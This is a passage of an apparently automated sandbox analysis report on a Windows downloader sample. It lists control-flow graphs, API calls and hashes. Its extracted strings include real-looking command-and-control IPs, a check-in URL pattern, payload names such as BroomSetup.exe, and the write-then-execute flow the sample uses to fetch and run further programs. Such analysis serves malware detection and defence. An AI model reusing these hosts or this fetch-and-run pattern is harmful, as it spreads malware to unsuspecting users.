425d0c 1383->1388 1384->1383 1392 425ce6-425cf8 call 401b1e call 426510 1384->1392 1388->1282 1400 425cfd 1392->1400 1400->1383 1439 425f84-425f96 call 401b1e call 426510 1420->1439 1440 425f9e-425fa5 call 40ff7e 1420->1440 1421->1284 1446 425f9b 1439->1446 1444 425faa 1440->1444 1444->1421 1446->1440
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 004265BC: __EH_prolog.LIBCMT ref: 004265C1
                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043BEDC), ref: 00424AD4
                                                                                                                                                                                                                                • Part of subcall function 0042604A: __EH_prolog.LIBCMT ref: 0042604F
                                                                                                                                                                                                                                • Part of subcall function 0042604A: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00426131
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
                                                                                                                                                                                                                              • String ID: .exe$.exe$.zip$/1/Package.zip$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$/timeSync.exe$185.172.128.203$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$SOFTWARE\BroomCleaner$\run.exe$five$note.padd.cn.com$sub=([\w-]{1,255})
                                                                                                                                                                                                                              • API String ID: 2531350358-1954608908
                                                                                                                                                                                                                              • Opcode ID: 9052fb54abde8957b0c8dcd2af763798e33b4e0189765b8ce0abbbbf1defcb6f
                                                                                                                                                                                                                              • Instruction ID: d125a89a0ba1aec4cd60c53361ca74c042bcd3054cac0714d62587379a507679
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9052fb54abde8957b0c8dcd2af763798e33b4e0189765b8ce0abbbbf1defcb6f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EFB2131050A2E19AC712FB7958567CA2FE49B62309F54687FE7D01F2A3CB78460C87DE
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1707 42628b-4262cf call 427830 CoInitialize CoCreateInstance 1710 4262d1-4262d6 1707->1710 1711 4262ef-4262f1 1707->1711 1712 4262d7-4262ee call 40ddc6 1710->1712 1713 4262f4-4262f9 1711->1713 1713->1713 1715 4262fb-426321 MultiByteToWideChar SysAllocStringLen 1713->1715 1717 426324-426329 1715->1717 1717->1717 1718 42632b-42633c MultiByteToWideChar 1717->1718 1719 42633f-426344 1718->1719 1719->1719 1720 426346-426365 MultiByteToWideChar SysAllocStringLen 1719->1720 1721 426368-42636d 1720->1721 1721->1721 1722 42636f-4263a6 MultiByteToWideChar 1721->1722 1724 4263a8-4263b7 1722->1724 1725 4263bc-4263e8 1722->1725 1724->1712 1728 4263f0-4263fd 1725->1728 1729 4263ea-4263ee 1725->1729 1732 42640f-426422 1728->1732 1733 4263ff-42640d 1728->1733 1729->1724 1736 426457-4264d2 1732->1736 1737 426424-426450 call 40ddc6 1732->1737 1733->1729 1749 4264d6-4264f2 call 40ddc6 1736->1749 1737->1736
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 004262AD
                                                                                                                                                                                                                              • CoCreateInstance.OLE32(00429220,00000000,00000001,00429210,?,?,?,?,?,?,?,?,?,?,?,/ping.php?substr=%s), ref: 004262C7
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 00426309
                                                                                                                                                                                                                              • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00426311
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 00426338
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 0042634E
                                                                                                                                                                                                                              • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00426355
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00000000,?), ref: 0042637A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$AllocString$CreateInitializeInstance
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3070066007-0
                                                                                                                                                                                                                              • Opcode ID: ce133915acab1118794e9b5cd677c6d3f7326e3d37cb49b767c5506a71b1f5aa
                                                                                                                                                                                                                              • Instruction ID: 83f5cca910cad30c2957a1169f386ac85e7f4b82ddc6b65933772462ec616701
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce133915acab1118794e9b5cd677c6d3f7326e3d37cb49b767c5506a71b1f5aa
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A914B75A00218AFDB04DFA8D888AEEBBB9FF49314F544559F805EB241D776AC02CB64
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1820 4139e7-4139f3 call 4177fa 1823 413a15-413a21 call 413a6c ExitProcess 1820->1823 1824 4139f5-413a03 GetPEB 1820->1824 1824->1823 1825 413a05-413a0f GetCurrentProcess TerminateProcess 1824->1825 1825->1823
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000003,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A08
                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A0F
                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00413A21
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                              • Opcode ID: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
                                                                                                                                                                                                                              • Instruction ID: 8e17948dea93fcc861bafccf52e4138581932e64e8d8508709b4de54f2ab24c4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83E0B631100108ABCF21AF65DD09A993B69EF54786F444029F9869A232DB39EE92CA48
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02F67DB6
                                                                                                                                                                                                                              • Module32First.KERNEL32(00000000,00000224), ref: 02F67DD6
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1898539579.0000000002F67000.00000040.00000020.00020000.00000000.sdmp, Offset: 02F67000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2f67000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3833638111-0
                                                                                                                                                                                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                              • Instruction ID: 2d402ed020165ce28c99d6a1cd2321347a2c863985980662354ac1bf5cd7a9cb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D3F062365007116BD7203AB59C8DBBAB6ECEF4966CF200929F743910C0DB70E8458A61
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1447 41a242-41a272 call 419fa5 1450 41a274-41a27f call 41236e 1447->1450 1451 41a28d-41a299 call 41e6a7 1447->1451 1458 41a281-41a288 call 412381 1450->1458 1456 41a2b2-41a2fb call 419f10 1451->1456 1457 41a29b-41a2b0 call 41236e call 412381 1451->1457 1467 41a368-41a371 GetFileType 1456->1467 1468 41a2fd-41a306 1456->1468 1457->1458 1465 41a564-41a56a 1458->1465 1469 41a373-41a3a4 GetLastError call 41234b CloseHandle 1467->1469 1470 41a3ba-41a3bd 1467->1470 1472 41a308-41a30c 1468->1472 1473 41a33d-41a363 GetLastError call 41234b 1468->1473 1469->1458 1484 41a3aa-41a3b5 call 412381 1469->1484 1476 41a3c6-41a3cc 1470->1476 1477 41a3bf-41a3c4 1470->1477 1472->1473 1478 41a30e-41a33b call 419f10 1472->1478 1473->1458 1481 41a3d0-41a41e call 41e5f0 1476->1481 1482 41a3ce 1476->1482 1477->1481 1478->1467 1478->1473 1489 41a420-41a42c call 41a121 1481->1489 1490 41a42e-41a452 call 419cc3 1481->1490 1482->1481 1484->1458 1489->1490 1496 41a456-41a460 call 4163fd 1489->1496 1497 41a465-41a4a8 1490->1497 1498 41a454 1490->1498 1496->1465 1500 41a4c9-41a4d7 1497->1500 1501 41a4aa-41a4ae 1497->1501 1498->1496 1504 41a562 1500->1504 1505 41a4dd-41a4e1 1500->1505 1501->1500 1503 41a4b0-41a4c4 1501->1503 1503->1500 1504->1465 1505->1504 1506 41a4e3-41a516 CloseHandle call 419f10 1505->1506 1509 41a518-41a544 GetLastError call 41234b call 41e7b9 1506->1509 1510 41a54a-41a55e 1506->1510 1509->1510 1510->1504
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00419F10: CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00419F2D
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041A356
                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 0041A35D
                                                                                                                                                                                                                              • GetFileType.KERNEL32(00000000), ref: 0041A369
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041A373
                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 0041A37C
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041A39C
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0041A4E6
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041A518
                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 0041A51F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                              • String ID: H
                                                                                                                                                                                                                              • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                              • Opcode ID: 975f7ae23b976af0f57ba7f63c5262953fac7c3e1b8646b278d3dfb303d0f39f
                                                                                                                                                                                                                              • Instruction ID: 6253cfc56dbab61e205766efb0611ca8061eb8c5ebbdbf8fd01913e42387971c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 975f7ae23b976af0f57ba7f63c5262953fac7c3e1b8646b278d3dfb303d0f39f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4A13632A041089FDF199F78D8517EE7BA1AB06324F14019EEC15EB391D7398DA2C79A
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1515 4192ad-4192bd 1516 4192d7-4192d9 1515->1516 1517 4192bf-4192d2 call 41236e call 412381 1515->1517 1518 419641-41964e call 41236e call 412381 1516->1518 1519 4192df-4192e5 1516->1519 1531 419659 1517->1531 1536 419654 call 410905 1518->1536 1519->1518 1522 4192eb-419316 1519->1522 1522->1518 1526 41931c-419325 1522->1526 1529 419327-41933a call 41236e call 412381 1526->1529 1530 41933f-419341 1526->1530 1529->1536 1534 419347-41934b 1530->1534 1535 41963d-41963f 1530->1535 1537 41965c-419661 1531->1537 1534->1535 1539 419351-419355 1534->1539 1535->1537 1536->1531 1539->1529 1542 419357-41936e 1539->1542 1544 419370-419373 1542->1544 1545 41938b-419394 1542->1545 1546 419375-41937b 1544->1546 1547 41937d-419386 1544->1547 1548 4193b2-4193bc 1545->1548 1549 419396-4193ad call 41236e call 412381 call 410905 1545->1549 1546->1547 1546->1549 1550 419427-419441 1547->1550 1552 4193c3-4193e1 call 417a45 call 41629a * 2 1548->1552 1553 4193be-4193c0 1548->1553 1580 419574 1549->1580 1555 419515-41951e call 4210f9 1550->1555 1556 419447-419457 1550->1556 1584 4193e3-4193f9 call 412381 call 41236e 1552->1584 1585 4193fe-419424 call 419800 1552->1585 1553->1552 1568 419591 1555->1568 1569 419520-419532 1555->1569 1556->1555 1560 41945d-41945f 1556->1560 1560->1555 1564 419465-41948b 1560->1564 1564->1555 1570 419491-4194a4 1564->1570 1573 419595-4195ad ReadFile 1568->1573 1569->1568 1575 419534-419543 GetConsoleMode 1569->1575 1570->1555 1571 4194a6-4194a8 1570->1571 1571->1555 1576 4194aa-4194d5 1571->1576 1578 419609-419614 GetLastError 1573->1578 1579 4195af-4195b5 1573->1579 1575->1568 1581 419545-419549 1575->1581 1576->1555 1583 4194d7-4194ea 1576->1583 1586 419616-419628 call 412381 call 41236e 1578->1586 1587 41962d-419630 1578->1587 1579->1578 1588 4195b7 1579->1588 1582 419577-419581 call 41629a 1580->1582 1581->1573 1589 41954b-419565 ReadConsoleW 1581->1589 1582->1537 1583->1555 1591 4194ec-4194ee 1583->1591 1584->1580 1585->1550 1586->1580 1598 419636-419638 1587->1598 1599 41956d-419573 call 41234b 1587->1599 1595 4195ba-4195cc 1588->1595 1596 419567 GetLastError 1589->1596 1597 419586-41958f 1589->1597 1591->1555 1601 4194f0-419510 1591->1601 1595->1582 1605 4195ce-4195d2 1595->1605 1596->1599 1597->1595 1598->1582 1599->1580 1601->1555 1609 4195d4-4195e4 call 418fc9 1605->1609 1610 4195eb-4195f6 1605->1610 1622 4195e7-4195e9 1609->1622 1612 419602-419607 call 418e09 1610->1612 1613 4195f8 call 419119 1610->1613 1620 4195fd-419600 1612->1620 1613->1620 1620->1622 1622->1582
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: e76cb713194fa4f728ec747c36cb0267ce7d8b1f5e695f35cd7f37fd194786d6
                                                                                                                                                                                                                              • Instruction ID: c4abe014ee414803f6a4a6dca87339887fd42b2314c6943b79fa01ee0dc397dc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e76cb713194fa4f728ec747c36cb0267ce7d8b1f5e695f35cd7f37fd194786d6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1CC13AB1E04249AFDB11CFA9C850BEE7BB1BF09314F04019AE954A7392C7389DC1CB69
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1623 315003c-3150047 1624 315004c-3150263 call 3150a3f call 3150e0f call 3150d90 VirtualAlloc 1623->1624 1625 3150049 1623->1625 1640 3150265-3150289 call 3150a69 1624->1640 1641 315028b-3150292 1624->1641 1625->1624 1646 31502ce-31503c2 VirtualProtect call 3150cce call 3150ce7 1640->1646 1643 31502a1-31502b0 1641->1643 1645 31502b2-31502cc 1643->1645 1643->1646 1645->1643 1652 31503d1-31503e0 1646->1652 1653 31503e2-3150437 call 3150ce7 1652->1653 1654 3150439-31504b8 VirtualFree 1652->1654 1653->1652 1655 31505f4-31505fe 1654->1655 1656 31504be-31504cd 1654->1656 1659 3150604-315060d 1655->1659 1660 315077f-3150789 1655->1660 1658 31504d3-31504dd 1656->1658 1658->1655 1665 31504e3-3150505 LoadLibraryA 1658->1665 1659->1660 1666 3150613-3150637 1659->1666 1663 31507a6-31507b0 1660->1663 1664 315078b-31507a3 1660->1664 1667 31507b6-31507cb 1663->1667 1668 315086e-31508be LoadLibraryA 1663->1668 1664->1663 1669 3150517-3150520 1665->1669 1670 3150507-3150515 1665->1670 1671 315063e-3150648 1666->1671 1672 31507d2-31507d5 1667->1672 1675 31508c7-31508f9 1668->1675 1673 3150526-3150547 1669->1673 1670->1673 1671->1660 1674 315064e-315065a 1671->1674 1676 3150824-3150833 1672->1676 1677 31507d7-31507e0 1672->1677 1678 315054d-3150550 1673->1678 1674->1660 1679 3150660-315066a 1674->1679 1680 3150902-315091d 1675->1680 1681 31508fb-3150901 1675->1681 1687 3150839-315083c 1676->1687 1682 31507e4-3150822 1677->1682 1683 31507e2 1677->1683 1684 3150556-315056b 1678->1684 1685 31505e0-31505ef 1678->1685 1686 315067a-3150689 1679->1686 1681->1680 1682->1672 1683->1676 1688 315056d 1684->1688 1689 315056f-315057a 1684->1689 1685->1658 1690 3150750-315077a 1686->1690 1691 315068f-31506b2 1686->1691 1687->1668 1692 315083e-3150847 1687->1692 1688->1685 1694 315057c-3150599 1689->1694 1695 315059b-31505bb 1689->1695 1690->1671 1696 31506b4-31506ed 1691->1696 1697 31506ef-31506fc 1691->1697 1698 3150849 1692->1698 1699 315084b-315086c 1692->1699 1706 31505bd-31505db 1694->1706 1695->1706 1696->1697 1700 31506fe-3150748 1697->1700 1701 315074b 1697->1701 1698->1668 1699->1687 1700->1701 1701->1686 1706->1678
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0315024D
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                                              • String ID: cess$kernel32.dll
                                                                                                                                                                                                                              • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                              • Instruction ID: 4f59c4d1c205a1665d409fb5751508bf9ab6107c3b516c1f4e712572a114aec7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3526974A01229DFDB64CF98C985BACBBB1BF09304F1580D9E95DAB351DB30AA85CF14
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1753 42615a-426191 call 42780c RegCreateKeyExA 1756 426222-426226 1753->1756 1757 426197-4261aa 1753->1757 1758 426231-426241 1756->1758 1759 426228-42622b RegCloseKey 1756->1759 1760 4261ad-4261b2 1757->1760 1759->1758 1760->1760 1761 4261b4-4261d3 call 402c71 1760->1761 1764 4261d6-4261db 1761->1764 1764->1764 1765 4261dd-426215 call 402c71 RegSetValueExA call 402bef 1764->1765 1769 42621a-42621d call 402bef 1765->1769 1769->1756
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 0042615F
                                                                                                                                                                                                                              • RegCreateKeyExA.KERNEL32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043BED8,SOFTWARE\BroomCleaner), ref: 00426187
                                                                                                                                                                                                                              • RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,?,0043BED8,0043BED9,Installed,Installed), ref: 0042620A
                                                                                                                                                                                                                              • RegCloseKey.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 0042622B
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseCreateH_prologValue
                                                                                                                                                                                                                              • String ID: Installed$SOFTWARE\BroomCleaner
                                                                                                                                                                                                                              • API String ID: 1996196666-529226407
                                                                                                                                                                                                                              • Opcode ID: 0b1f03838103bc79192dd29aecd11cdb4eee571ac517255c8300f4294fb95730
                                                                                                                                                                                                                              • Instruction ID: 7631ba6f6479b49e2955b4a66f7b67ea7b8ea0f8d2650bf46820f955d15f7583
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0b1f03838103bc79192dd29aecd11cdb4eee571ac517255c8300f4294fb95730
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3319A71A00129EEDF149FA8DC94AFEBB78EB08348F44016EE80277281C7B11D05CB64
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1771 426510-42651f 1772 426521-426527 1771->1772 1772->1772 1773 426529-42655c ShellExecuteExA 1772->1773 1774 426575-426581 call 402bef 1773->1774 1775 42655e-42656f WaitForSingleObject CloseHandle 1773->1775 1775->1774
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ShellExecuteExA.SHELL32(?,.exe), ref: 00426552
                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00008000), ref: 00426566
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0042656F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseExecuteHandleObjectShellSingleWait
                                                                                                                                                                                                                              • String ID: .exe
                                                                                                                                                                                                                              • API String ID: 3837156514-4119554291
                                                                                                                                                                                                                              • Opcode ID: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
                                                                                                                                                                                                                              • Instruction ID: 8ce7cd6e21d80bec1428d2ca161df36b0ad46b5534dc267783c352d5b9ba18c9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B015A31E00218ABDF15DFA9E8459DDBBB8FF08340F418126F801A6260EB709A45CB84
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1778 426242-426267 CreateFileA 1779 426284-42628a 1778->1779 1780 426269-42627e WriteFile FindCloseChangeNotification 1778->1780 1780->1779
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000,?,.exe,00000000,?,?,0042590D,00000001,?,/ping.php?substr=%s), ref: 0042625D
                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000001,00000000,?,0042590D,00000001,?,/ping.php?substr=%s,?), ref: 00426275
                                                                                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(00000000,?,0042590D,00000001,?,/ping.php?substr=%s,?), ref: 0042627E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$ChangeCloseCreateFindNotificationWrite
                                                                                                                                                                                                                              • String ID: .exe
                                                                                                                                                                                                                              • API String ID: 3805958096-4119554291
                                                                                                                                                                                                                              • Opcode ID: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
                                                                                                                                                                                                                              • Instruction ID: 1160b3d028a4f0b3eb39880a7a2cc02b481a356c14d22bba427b687e2e61c155
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19E06D72701224BBD7311B9AAC48FABBE6CEF86AA4F040165FB05D2110A6A1DC0197B8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1781 4163fd-416411 call 41e84a 1784 416413-416415 1781->1784 1785 416417-41641f 1781->1785 1786 416465-416485 call 41e7b9 1784->1786 1787 416421-416428 1785->1787 1788 41642a-41642d 1785->1788 1798 416493 1786->1798 1799 416487-416491 call 41234b 1786->1799 1787->1788 1790 416435-416449 call 41e84a * 2 1787->1790 1791 41644b-41645b call 41e84a FindCloseChangeNotification 1788->1791 1792 41642f-416433 1788->1792 1790->1784 1790->1791 1791->1784 1801 41645d-416463 GetLastError 1791->1801 1792->1790 1792->1791 1803 416495-416498 1798->1803 1799->1803 1801->1786
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,0041631B,?,?,?,?,?,?,?,?,?,00427EC5,000000FF), ref: 00416453
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,0041631B,?,?,?,?,?,?,?,?,?,00427EC5,000000FF), ref: 0041645D
                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00416488
                                                                                                                                                                                                                              Memory Dump Source
